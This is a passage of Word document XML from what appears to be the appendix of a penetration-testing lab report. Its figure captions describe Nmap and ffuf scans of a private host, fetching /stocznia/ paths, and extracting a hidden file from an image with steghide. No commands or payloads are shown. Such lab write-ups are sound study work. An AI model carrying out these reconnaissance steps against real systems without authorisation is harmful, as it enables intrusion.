          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Pinging the Detected Host on Subnet 2</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06764748" w14:textId="52F96009" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="resource37"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="506957D7" wp14:editId="03E7F769">
            <wp:extent cx="4816284" cy="2093495"/>
            <wp:effectExtent l="0" t="0" r="3810" b="2540"/>
            <wp:docPr id="10481642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843951" cy="2105521"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF765A4" w14:textId="03E31A82" w:rsidR="005F3C61" w:rsidRPr="002D6FEB" w:rsidRDefault="005F3C61" w:rsidP="002D6FEB">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="467886" w:themeColor="hyperlink"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="paragraph37" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A</w:t>
        </w:r>
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Results of Using Nmap to scan ports</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEF650D" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="resource38"/>
    </w:p>
    <w:p w14:paraId="223B4B40" w14:textId="4FE922F8" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="077E4D89" wp14:editId="40607805">
            <wp:extent cx="4293704" cy="4030980"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="7492898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rotWithShape="1">
                    <a:blip r:embed="rId86">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="20478"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4293704" cy="4030980"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01941A" w14:textId="3A7CA520"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hyperlink w:anchor="paragraph38" w:history="1">
        <w:r w:rsidRPr="00D77DFE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>Figure A.21</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Results of Using ffuf on 10.0.2.178:8080/</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F508526" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="262"/>
    <w:bookmarkEnd w:id="263"/>
    <w:p w14:paraId="470B162B" w14:textId="2FDDEC54" w:rsidR="00192A1E" w:rsidRPr="00D77DFE" w:rsidRDefault="00192A1E" w:rsidP="009E5B3F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FA8D087" w14:textId="77777777" w:rsidR="00C13182" w:rsidRDefault="00C13182" w:rsidP="00192A1E">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71841C68" w14:textId="51297CE2" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00192A1E">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1839B2D2" wp14:editId="6C353B1B">
            <wp:extent cx="4253947" cy="2828290"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="139543476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rotWithShape="1">
                    <a:blip r:embed="rId87" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="-1213" r="26770"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4264636" cy="2835397"/>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64" w:name="resource39"/>
    <w:p w14:paraId="25AA9FC0" w14:textId="5AD7836E"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"paragraph39"</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A.22</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bookmarkEnd w:id="264"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Command Curl /stocznia/</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3097ED" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00192A1E">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3899AD6B" w14:textId="77777777" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E683F67" w14:textId="77777777" w:rsidR="00C13182" w:rsidRDefault="00C13182" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16405353" w14:textId="681F9371" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00A5079F">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6E538C75" wp14:editId="6344F95F">
            <wp:extent cx="4301655" cy="2345690"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="146069642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88" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="16960"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4321466" cy="2356493"/>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65" w:name="resource40"/>
    <w:p w14:paraId="1EEE9488" w14:textId="2D54E17D" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00C13182">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"paragraph40"</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A.23</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bookmarkEnd w:id="265"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>: Results of Source Code of /stocznia/images Endpoin</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>t.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B8318" w14:textId="77777777" w:rsidR="00A5079F" w:rsidRDefault="00A5079F" w:rsidP="00192A1E">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="781FF29A" w14:textId="77777777" w:rsidR="00883F52" w:rsidRPr="00D77DFE" w:rsidRDefault="00883F52" w:rsidP="00192A1E">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED55E6F" w14:textId="035BB9F3" w:rsidR="00A5079F" w:rsidRPr="00D77DFE" w:rsidRDefault="00A5079F" w:rsidP="00C13182">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1F4E02FD" wp14:editId="232A7F7A">
            <wp:extent cx="2743200" cy="1004238"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="196520349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89">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect r="55731"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2814320" cy="1030274"/>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66" w:name="resource41"/>
    <w:p w14:paraId="5C3DB8F8" w14:textId="2C5B4A62"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"paragraph41"</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A.24</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Downloading the Photo From /stocznia/images/photo.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="266"/>
    <w:p w14:paraId="56919B27" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00A5079F">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DB328F" w14:textId="4E3EA114" w:rsidR="006F5BA4" w:rsidRPr="00D77DFE" w:rsidRDefault="006F5BA4" w:rsidP="00192A1E">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="039AE35F" wp14:editId="5E11B15F">
            <wp:extent cx="4415994" cy="373409"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="6933850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549794" cy="384723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="267" w:name="resource42"/>
    <w:p w14:paraId="162A7A5D" w14:textId="7CAAF18E" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61"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"paragraph42"</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A.25</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Result of Using steghide Tool to Extract Hidden File</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B72FC61" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="0037349A">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17A4250F" w14:textId="5C2E68B0" w:rsidR="0037349A" w:rsidRPr="00D77DFE" w:rsidRDefault="0037349A" w:rsidP="0037349A">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3230DD3C" wp14:editId="4A37DD37">
            <wp:extent cx="4362243" cy="277758"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:docPr id="116528896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rotWithShape="1">
                    <a:blip r:embed="rId91">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="8998" t="3012"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4364056" cy="277873"/>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68" w:name="resource43"/>
    <w:p w14:paraId="5C101DA3" w14:textId="4501DF47" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="00D815B8">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"paragraph43"</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A.26:</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Reading the Extracted File from photo.jpg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="268"/>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068171FF" w14:textId="77777777" w:rsidR="00D815B8" w:rsidRDefault="00D815B8" w:rsidP="0037349A">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF0CD1F" w14:textId="3E1D5638" w:rsidR="0037349A" w:rsidRPr="00D77DFE" w:rsidRDefault="0037349A" w:rsidP="0037349A">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DC79D77" wp14:editId="1A7E012E">
            <wp:extent cx="4224875" cy="1311215"/>
            <wp:effectExtent l="0" t="0" r="4445" b="3810"/>
            <wp:docPr id="40593790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r="26827"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4242853" cy="1316794"/>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69" w:name="resource44"/>
    <w:p w14:paraId="29CE80D3" w14:textId="33F479F9" w:rsidR="00D815B8" w:rsidRDefault="005F3C61" w:rsidP="00883F52">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"paragraph44"</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A.27</w:t>
      </w:r>
      <w:bookmarkEnd w:id="269"/>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Source code of /stocznia/_backup/</w:t>
      </w:r>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB88E10" w14:textId="77777777" w:rsidR="00883F52" w:rsidRDefault="00883F52" w:rsidP="00883F52">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7067003C" w14:textId="5EE8F366" w:rsidR="0037349A" w:rsidRPr="00D77DFE" w:rsidRDefault="0037349A" w:rsidP="0037349A">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D9035A7" wp14:editId="2E22F683">
            <wp:extent cx="4320710" cy="931653"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="97141658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r="33673"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4446981" cy="958880"/>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70" w:name="resource45"/>
    <w:p w14:paraId="48F4C1B0" w14:textId="61988A0A"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"paragraph45"</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A.28:</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bookmarkEnd w:id="270"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Content of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>file.bak</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00883F52">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65BE27" w14:textId="77777777" w:rsidR="005F3C61" w:rsidRPr="00D77DFE" w:rsidRDefault="005F3C61" w:rsidP="0037349A">
      <w:pPr>
        <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:eastAsia="PMingLiU" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:color w:val="0D0D0D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="239C70A6" w14:textId="242DB3F5" w:rsidR="00F057ED" w:rsidRPr="00D77DFE" w:rsidRDefault="00F057ED" w:rsidP="00F057ED">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3FFE8E0D" wp14:editId="255626DF">
            <wp:extent cx="5399405" cy="1859280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
